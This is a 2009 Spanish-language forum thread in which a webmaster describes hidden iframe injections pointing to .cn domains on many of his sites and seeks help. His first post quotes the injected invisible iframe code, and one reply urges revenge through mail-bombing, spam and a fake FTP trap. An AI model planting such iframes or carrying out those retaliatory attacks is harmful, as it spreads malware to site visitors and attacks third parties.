Hackeo en sitios web.

santiago872 · #1 (**permalink**) 20/04/2009, 09:50

Hola, escribo ya que estoy desesperado. En más de 15 sitios se me ha colocado un iframe, y el mismo apunta a diferentes web con dominio.cn
Ha modificado todo archivo que contenga en su nombre "index" o "home"
en todo el sitio,y por mas que reemplace el archivo, vuelve a aparecer.
Las paginas afectadas en un comienzo ejecutaban un troyano q el antivirus bloqueaba, y ahora no es posible verlas.
Lo que es mas raro aun es que algunos de estos sitios estan en servidores diferentes, por lo que de alguna manera obtienen los datos de FTP.

A continuación les adjunto el codigo de los iframes que se colocan:

<iframe src="direccion.cn" width=1 height=1 style="visibility: hidden"></iframe>

Si ha alguien le ha sucedido, o puede ayudarme, estaria agradecido.

pitufoweb · #2 (**permalink**) 20/04/2009, 11:53

Usas algún script en la pagina (foro, cms, galeria,etc..)?

Bye

santiago872 · #3 (**permalink**) 21/04/2009, 13:03

Cita:

Iniciado por pitufoweb

Usas algún script en la pagina (foro, cms, galeria,etc..)?

Bye

Hola. En uno de los sitios tenia wordpress y joomla (Lei en varios foros que este tipo de aplicaciones presentan vulnerabilidades), pero en el resto de los sitios no tengo nada de ello.

santiago872 · #4 (**permalink**) 21/04/2009, 13:43

Por lo visto, he encontrado casos similares en varios paises.
Estoy casi seguro que lo que el virus hace es meterse en la pc y robar las contraseñas del ftp. He cambiado todas las contraseñas de los sitios y deje sin funcionamiento a los ftps que tengo configurados en un par de equipos.
Voy a comprobar si es ello, en ese caso el problema base estaria en alguno de mis ordenadores, desde donde se mandarian los usuarios y pass.

kennysamuerto · #5 (**permalink**) 21/04/2009, 13:46

Cita:

Iniciado por santiago872

Por lo visto, he encontrado casos similares en varios paises.
Estoy casi seguro que lo que el virus hace es meterse en la pc y robar las contraseñas del ftp. He cambiado todas las contraseñas de los sitios y deje sin funcionamiento a los ftps que tengo configurados en un par de equipos.
Voy a comprobar si es ello, en ese caso el problema base estaria en alguno de mis ordenadores, desde donde se mandarian los usuarios y pass.

Como dudo eso que dices.

Me huele mas a una vulnerabilidad de tu servidor, que a un virus.

jaao_death · #6 (**permalink**) 21/04/2009, 13:48

Intenta no borrar el Trojano que te causa problemas para así averiguar a que dirección manda tus datos, luego le puedes hacer un mail-bombing o spam para que tu venganza tome parte, o intenta conseguir datos de ese usuario mandándole una ftp falsa y que le dirija a algún pc tuyo, así guardas los datos y le haces la broma....

santiago872 · #7 (**permalink**) 21/04/2009, 14:23

Cita:

Iniciado por kennysamuerto

Como dudo eso que dices.

Me huele mas a una vulnerabilidad de tu servidor, que a un virus.

He descartado eso, ya que tengo un par de sitios en servidores diferentes (dos de ellos en otro pais) y les ha sucedido lo mismo.
Por ahora no ha sucedido nuevamente, en ninguno de los sitios volvio a aparecer el iframe.
Igualmente estoy atento, por si vuelve a suceder.
Por lo que he leido en algunos articulos, el problema estaria en el ordenador.

zaetoner · #8 (**permalink**) 22/04/2009, 00:58

me parece que es un script en el .htacces revisalo esta en la raiz de tu web

CircuitoX · #9 (**permalink**) 22/04/2009, 07:57

Podrías poner las direcciones de las Web. Que supuestamente están sufriendo un hackeo.

santiago872 · #10 (**permalink**) 22/04/2009, 09:39

Hola a todos, gracias por sus aportes.

Hace ya 2 dias q modifique todas las contraseñas y tengo los ftp sin configurar, por ahora no volvieron a modificar los sitios.

Disculpen que no les pase alguna de las web para ver, igualmente hice backup del servidor de todos los sitios afectados.

Rds_hmc · #11 (**permalink**) 22/04/2009, 09:48

Pon las webs y así podremos ver todo con detalle.